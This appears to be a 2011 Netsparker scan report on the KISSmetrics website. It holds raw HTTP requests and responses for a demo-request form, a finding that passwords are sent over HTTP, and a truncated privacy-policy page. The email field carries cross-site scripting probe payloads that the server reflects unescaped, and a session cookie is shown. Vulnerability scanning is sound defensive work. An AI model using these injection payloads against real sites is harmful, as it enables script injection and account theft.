<!DOCTYPE html><html> <head> <title>Request a Demo - KISSmetrics</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div 
class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav active"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Request a Demo</h2> <p>Want to see what KISSmetrics can do for you? 
Fill out the form below and we&rsquo;ll get back to you to schedule a demo.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup/enterprise" method="post" id="enterprise_signup_form"> <h3>KISSmetrics demo request</h3> <p>Enter your information below and one of our KISSmetrics team members will contact you.</p> <hr class="thin" /> <fieldset> <p class="half"> <label for="request[first_name]">First name:</label> <input type="text" class="text" name="request[first_name]" value="Smith" /> </p> <p class="half"> <label for="request[last_name]">Last name:</label> <input type="text" class="text" name="request[last_name]" value="Smith" /> </p> <p class="clear half"> <label for="request[company]">Company:</label> <input type="text" class="text" name="request[company]" value="3" /> </p> <p class="half"> <label for="request[company_size]">Company size:</label> <select name="request[company_size]"><option value="1 to 5 people" selected="selected">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="request[url]">Company website:</label> <input type="text" class="text" name="request[url]" value="3" /> </p> <p class="half"> <label for="email">Email address:</label> <input type="text" class="text" name="request[email]" value="'" ns= netsparker(0x0006C3) " /> <span class="error">Email does not appear to be valid</span> </p> <p class="half"> <label for="phone">Telephone number:</label> <input type="text" class="text" name="request[phone]" value="3" /> </p> <div 
style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p class="clear"> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#enterprise_signup_form').submit();} return false" class="blue button with_arrow">Let&rsquo;s talk</a> </p> </fieldset> </form> </div><!-- /.col --><div class="trial col side"> <p>We&rsquo;ve got a bunch of really smart customers, who are using KISSmetrics to get even smarter.</p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. 
Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? 
Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. 
All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p class="buttons"><a href="#" onclick="$('#forgot_form').submit(); return false;" class="blue button with_arrow">Recover password</a> </form> </div> </div> </div> </div> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="/javascript/external.1669.js" type="text/javascript"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape(&q..
- /signup/enterprise

/signup/enterprise

https://www.kissmetrics.com/signup/enterprise

Parameters

Parameter Type Value
request%5Bfirst_name%5D POST Smith
request%5Blast_name%5D POST Smith
request%5Bcompany%5D POST 3
request%5Burl%5D POST 3
request%5Bemail%5D POST '" ns= alert(0x0006C5)
request%5Bphone%5D POST 3

Request

POST /signup/enterprise HTTP/1.1
Referer: https://www.kissmetrics.com/signup/enterprise
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 179
Expect: 100-continue
Accept-Encoding: gzip, deflate

request%5Bfirst_name%5D=Smith&request%5Blast_name%5D=Smith&request%5Bcompany%5D=3&request%5Burl%5D=3&request%5Bemail%5D=%27%22%20ns=%20netsparker(0x0006C5)%20&request%5Bphone%5D=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 21:05:34 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
Content-Length: 4882
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Request a Demo - KISSmetrics</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div 
class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav active"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Request a Demo</h2> <p>Want to see what KISSmetrics can do for you? 
Fill out the form below and we&rsquo;ll get back to you to schedule a demo.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup/enterprise" method="post" id="enterprise_signup_form"> <h3>KISSmetrics demo request</h3> <p>Enter your information below and one of our KISSmetrics team members will contact you.</p> <hr class="thin" /> <fieldset> <p class="half"> <label for="request[first_name]">First name:</label> <input type="text" class="text" name="request[first_name]" value="Smith" /> </p> <p class="half"> <label for="request[last_name]">Last name:</label> <input type="text" class="text" name="request[last_name]" value="Smith" /> </p> <p class="clear half"> <label for="request[company]">Company:</label> <input type="text" class="text" name="request[company]" value="3" /> </p> <p class="half"> <label for="request[company_size]">Company size:</label> <select name="request[company_size]"><option value="1 to 5 people">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="request[url]">Company website:</label> <input type="text" class="text" name="request[url]" value="3" /> </p> <p class="half"> <label for="email">Email address:</label> <input type="text" class="text" name="request[email]" value="'" ns= netsparker(0x0006C5) " /> <span class="error">Email does not appear to be valid</span> </p> <p class="half"> <label for="phone">Telephone number:</label> <input type="text" class="text" name="request[phone]" value="3" /> </p> <div 
style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p class="clear"> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#enterprise_signup_form').submit();} return false" class="blue button with_arrow">Let&rsquo;s talk</a> </p> </fieldset> </form> </div><!-- /.col --><div class="trial col side"> <p>We&rsquo;ve got a bunch of really smart customers, who are using KISSmetrics to get even smarter.</p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. 
Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? 
Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. 
All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p class="buttons"><a href="#" onclick="$('#forgot_form').submit(); return false;" class="blue button with_arrow">Recover password</a> </form> </div> </div> </div> </div> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="/javascript/external.1669.js" type="text/javascript"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost..
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept the network traffic (for example on a shared or untrusted network), he/she can read the submitted credentials in clear text and steal users' accounts.

Actions to Take

  1. See the Remedy section below for the solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP; redirect HTTP requests for those pages to their HTTPS equivalents.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms that collect sensitive data should be served over HTTPS, not only submitted to an HTTPS action, since a form served over HTTP can be modified in transit before the user submits it. All parts of the application that accept user input, starting with the login process, should be served only over HTTPS.

Classification

OWASP A9, PCI v1.2-6.5.9, PCI v2.0-6.5.4, CWE-311, WASC-04
- /privacy

/privacy CONFIRMED

http://www.kissmetrics.com/privacy

Form target action

/login

Request

GET /privacy HTTP/1.1
Referer: https://www.kissmetrics.com/terms
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:38:09 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>KISSmetrics Privacy Policy</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" 
id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="wrap"> <h2>KISSmetrics Privacy Policy</h2> <hr /> <p>Space Pencil, Inc., aka KISSmetrics, ("<b>KISSmetrics</b>" or "<b>we</b>" or "<b>our</b>"), makes available a service that enables a website operator to have collected and tracked certain data and information regarding the characteristics and activities of visitors to websites owned or controlled by the website operator or operated by the website operator on behalf of a third party and to view certain analytical reports based on such data and information (the "<b>Service</b>"). A website operator that desires to use the Service must execute a separate online agreement with KISSmetrics (a website operator that executes such an agreement, a "<b>KISSmetrics Customer</b>"). Under such agreement, KISSmetrics grants the KISSmetrics Customer a license to use certain software code that, when installed on a website, collects and track certain data and information regarding the characteristics and activities of visitors to website (collectively, "<b>Website Visitor Data</b>").</p> <p>KISSmetrics provides this Privacy Policy to inform you of our policies and procedures regarding the collection, use and disclosure of personal information that we receive from you. 
This Privacy Policy may be updated from time to time. We will notify you of any material changes by posting the new Privacy Policy on the KISSmetrics website (the "Site"). You are advised to consult this policy regularly for any changes.</p> <p>This Privacy Policy applies only to information that KISSmetrics Customers provide to us during their registration with KISSmetrics as a KISSmetrics Customer and their creation of a KISSmetrics Customer account and in conjunction with their access to and use of the Service. This privacy policy does not apply to any Website Visitor Data that KISSmetrics may collect, obtain or access in connection with operating the Service.</p> <p>As used in this policy, the terms "using" and "processing" information include using cookies on a computer, subjecting the information to statistical or other analysis and using or handling information in any way, including, but not limited to collecting, storing, evaluating, modifying, deleting, using, combining, disclosing and transferring information within our organization or among our affiliates within the United States or internationally.</p> <h3>Information Collection and Use</h3> <p><i>Personally Identifiable Information.</i></p> <ul> <li>When you register with us through the Site, as a KISSmetrics Customer, we will ask you for personally identifiable information. This refers to information about you that can be used to contact or identify you. Personally identifiable information includes, but is not limited to, your name, phone number, credit card or other billing information (if applicable), email address and home and business postal addresses. 
We use your personally identifiable information mainly to provide the Service and administer your inquiries.</li> <li>We also collect other non-identifying information that you provide as part of registration (e.g., without limitation, zip code (on its own) and individual preferences).</li> <li>We use your personally identifiable information (in some cases, in conjunction with your non-identifying Information) mainly to provide the Service, complete your transactions, and administer your inquiries.</li> <li>Certain non-identifying Information would be considered a part of your personally identifiable information if it were combined with other identifiers (for example, combining your zip code with your street address) in a way that enables you to be identified. But the same pieces of information are considered non-identifying Information when they are taken alone or combined only with other non-identifying information (for example, your viewing preferences). We may combine your personally identifiable information with non-identifying Information and aggregate it with information collected from other KISSmetrics Users (defined below) to attempt to provide you with a better experience, to improve the quality and value of the Service and to analyze and understand how our Site and Service are used. We may also use the combined information without aggregating it to serve you specifically, for instance to deliver a product to you according to your preferences or restrictions.</li> <li>We also use your personally identifiable information to contact you with KISSmetrics newsletters, marketing or promotional materials and other information that may be of interest to you. If you decide at any time that you no longer wish to receive such communications from us, please follow the unsubscribe instructions provided in any of the communications or update your "user preferences" information. 
